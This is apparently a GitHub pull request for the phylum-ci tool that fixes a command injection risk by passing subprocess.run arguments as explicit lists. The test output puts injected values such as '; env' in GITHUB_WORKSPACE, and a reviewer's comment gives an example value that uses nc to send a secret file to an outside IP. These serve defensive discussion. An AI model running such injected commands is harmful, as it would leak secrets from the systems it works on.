fix: sanitize user input to guard against possible cmd injection #144

maxrake · 2022-10-14T04:01:44Z

This change backs out the use of the shlex module to quote the parts
of any command line that can possibly come from user supplied input.
Explicit lists of command line arguments are used instead. Every element
of each list is a single string, regardless of whitespace contained
within. This is true for both static string literals and variables,
whether they came from user input or not. Therefore, each element in the
list will be considered a separate token/argument when supplied to a
subprocess.run call. Every instance of subprocess.run was reviewed
and updated to this new format.

Fixes #143

Checklist

Does this PR have an associated issue (i.e., closes #<issueNum> in description above)?
Have you ensured that you have met the expected acceptance criteria?
~~Have you created sufficient tests?~~
- No automated tests
- Manual testing was performed to help ensure no regressions
Have you updated all affected documentation?

Screenshots

The same sequence of commands as outlined in #143, but this time with no program halt or stack trace displayed:

../phylum-ci  6  18 on  weird_shlex [!?] is 📦 v0.17.0 via 🐍 v3.10.6
❯ git config --global --get safe.directory

../phylum-ci  6  18 on  weird_shlex [!?] is 📦 v0.17.0 via 🐍 v3.10.6
✖ 1 ❯ GITHUB_ACTIONS=true GITHUB_WORKSPACE="/github/workspace/good;env" poetry run phylum-ci -afl poetry.lock
 [+] CI environment detected: GitHub Actions
 [-] Provided lockfile: /Users/maxrake/dev/phylum/phylum-ci/poetry.lock
 [+] Confirming pre-requisites ...
 [+] Existing `.phylum_project` file found at: /Users/maxrake/dev/phylum/phylum-ci/.phylum_project
 [+] `git` binary found on the PATH
 [!] A GitHub token with API access must be set at `GITHUB_TOKEN` environment variable

../phylum-ci  6  18 on  weird_shlex [!?] is 📦 v0.17.0 via 🐍 v3.10.6 took 2s
✖ 1 ❯ git config --global --get safe.directory
/github/workspace/good;env

../phylum-ci  6  18 on  weird_shlex [!?] is 📦 v0.17.0 via 🐍 v3.10.6
❯ GITHUB_ACTIONS=true GITHUB_WORKSPACE="/github/workspace/bad; env" poetry run phylum-ci -afl poetry.lock
 [+] CI environment detected: GitHub Actions
 [-] Provided lockfile: /Users/maxrake/dev/phylum/phylum-ci/poetry.lock
 [+] Confirming pre-requisites ...
 [+] Existing `.phylum_project` file found at: /Users/maxrake/dev/phylum/phylum-ci/.phylum_project
 [+] `git` binary found on the PATH
 [!] A GitHub token with API access must be set at `GITHUB_TOKEN` environment variable

../phylum-ci  6  18 on  weird_shlex [!?] is 📦 v0.17.0 via 🐍 v3.10.6 took 2s
✖ 1 ❯ git config --global --get safe.directory
/github/workspace/bad; env

This change makes use of the `shlex` module to `quote` the parts of any command line that can possibly come from user supplied input. The command line is then `split` with the same module to ensure proper and sanitized tokenization when supplied to a `subprocess.run` call. The `shlex` module is only designed for Unix shells. The `shlex.quote()` function is not guaranteed to be correct on non-POSIX compliant shells or shells from other operating systems such as Windows. Therefore, the documentation and PyPI package classifiers were updated to make that operating limitation more obvious. Fixes #143

andreaphylum

The overall approach and the diff look good to me.

While reading the code, I realized something, though I may be wildly off-base: could the same risk mitigation be achieved by specifying the arguments to subprocess.run as a list? IIRC, something like

user_input = "/etc/motd ; nc 1.2.3.4 5678 < /super/secret/file"
subprocess.run(["sh", "-c", "cat", user_input])

should already prevent command injection, though it definitely looks way more verbose in the code.

I don't believe we should change the current solution, anyway, especially if it has some other advantages that I'm not aware of, but could be worth considering if it could help address the case of non-POSIX shells.

src/phylum/ci/ci_azure.py

README.md

This change backs out the use of the `shlex` module to quote the parts of any command line that can possibly come from user supplied input. Explicit lists of command line arguments are used instead. Every element of each list is a single string, regardless of whitespace contained within. This is true for both static string literals and variables, whether they came from user input or not. Therefore, each element in the list will be considered a separate token/argument when supplied to a `subprocess.run` call. Every instance of `subprocess.run` was reviewed and updated to this new format. Fixes #143

src/phylum/ci/cli.py

The `shlex.join` method was introduced in Python 3.8 so the TODO comment reminders are tied to the issue to drop Python 3.7 support.

src/phylum/ci/cli.py

The `shlex.join` method turns out to be a one-liner that can easily be inlined in the current code base.

maxrake requested a review from a team as a code owner October 14, 2022 04:01

maxrake self-assigned this Oct 14, 2022

maxrake requested a review from andreaphylum October 14, 2022 04:01

maxrake mentioned this pull request Oct 14, 2022

fix: sanitize user input to guard against possible cmd injection #133

Closed

andreaphylum previously approved these changes Oct 14, 2022

View reviewed changes

kylewillmon requested changes Oct 14, 2022

View reviewed changes

src/phylum/ci/ci_azure.py Outdated Show resolved Hide resolved

README.md Outdated Show resolved Hide resolved

maxrake dismissed andreaphylum’s stale review via 6eb965f October 14, 2022 18:50

maxrake requested review from kylewillmon and andreaphylum October 14, 2022 19:02

Merge branch 'main' into weird_shlex

03a4ada

kylewillmon previously approved these changes Oct 17, 2022

View reviewed changes

src/phylum/ci/cli.py Outdated Show resolved Hide resolved

docs: add TODO reminders to use shlex.join

bd9036d

The `shlex.join` method was introduced in Python 3.8 so the TODO comment reminders are tied to the issue to drop Python 3.7 support.

maxrake dismissed kylewillmon’s stale review via bd9036d October 17, 2022 16:59

maxrake requested a review from kylewillmon October 17, 2022 17:00

kylewillmon requested changes Oct 17, 2022

View reviewed changes

src/phylum/ci/cli.py Outdated Show resolved Hide resolved

refactor: construct shell escaped command lines before printing them

cda8ef9

The `shlex.join` method turns out to be a one-liner that can easily be inlined in the current code base.

kylewillmon approved these changes Oct 17, 2022

View reviewed changes

maxrake merged commit 4d72ece into main Oct 17, 2022

maxrake deleted the weird_shlex branch October 17, 2022 17:21

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

fix: sanitize user input to guard against possible cmd injection #144

fix: sanitize user input to guard against possible cmd injection #144

maxrake commented Oct 14, 2022 •

edited

Loading

andreaphylum left a comment

fix: sanitize user input to guard against possible cmd injection #144

fix: sanitize user input to guard against possible cmd injection #144

Conversation

maxrake commented Oct 14, 2022 • edited Loading

Checklist

Screenshots

andreaphylum left a comment

Choose a reason for hiding this comment

maxrake commented Oct 14, 2022 •

edited

Loading